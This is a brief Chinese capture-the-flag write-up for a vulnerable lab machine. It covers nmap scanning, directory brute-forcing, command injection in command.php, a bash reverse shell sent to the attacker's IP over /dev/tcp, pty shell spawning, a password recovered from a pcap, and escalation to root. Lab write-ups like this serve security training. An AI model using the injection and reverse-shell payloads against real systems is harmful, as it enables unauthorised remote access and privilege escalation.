1、发现主机
使用nmap对内网进行扫描,发现主机
nmap -sP 192.168.340/24
2、扫描端口
用nmap扫描目标主机,发现只有33447端口开启,http端口
nmap -sV -p0-65535 192.168.34.151
3、扫描网站目录并进行爆破
dirb http://192.168.34.151:33447
发现Challenge目录,进行目录爆破
访问可正常显示的页面
http://192.168.34.151/Challenge/cake.php => /Magic_Box
继续爆破
3、漏洞挖掘
命令注入:
http://192.168.34.151:33447/Challenge/Magic_Box/command.php
4、反弹shell
192.168.34.179 && echo ‘bash -i >& /dev/tcp/192.168.34.179/1122 0>&1’ | bash(192.168.34.179为攻击机卡里的IP地址)
获取交互式shell
python -c 'import pty;pty.spawn("/bin/sh")'
5、提权
cat /etc/passwd发现几个用户:acid,saman,root
find / -user acid 2 >/dev/null
发现一个hint.pcapng
使用wireshark然后追踪tcp流
发现saman的密码:1337hax0r
su提权到saman
在使用sudo -i提权到root,获得flag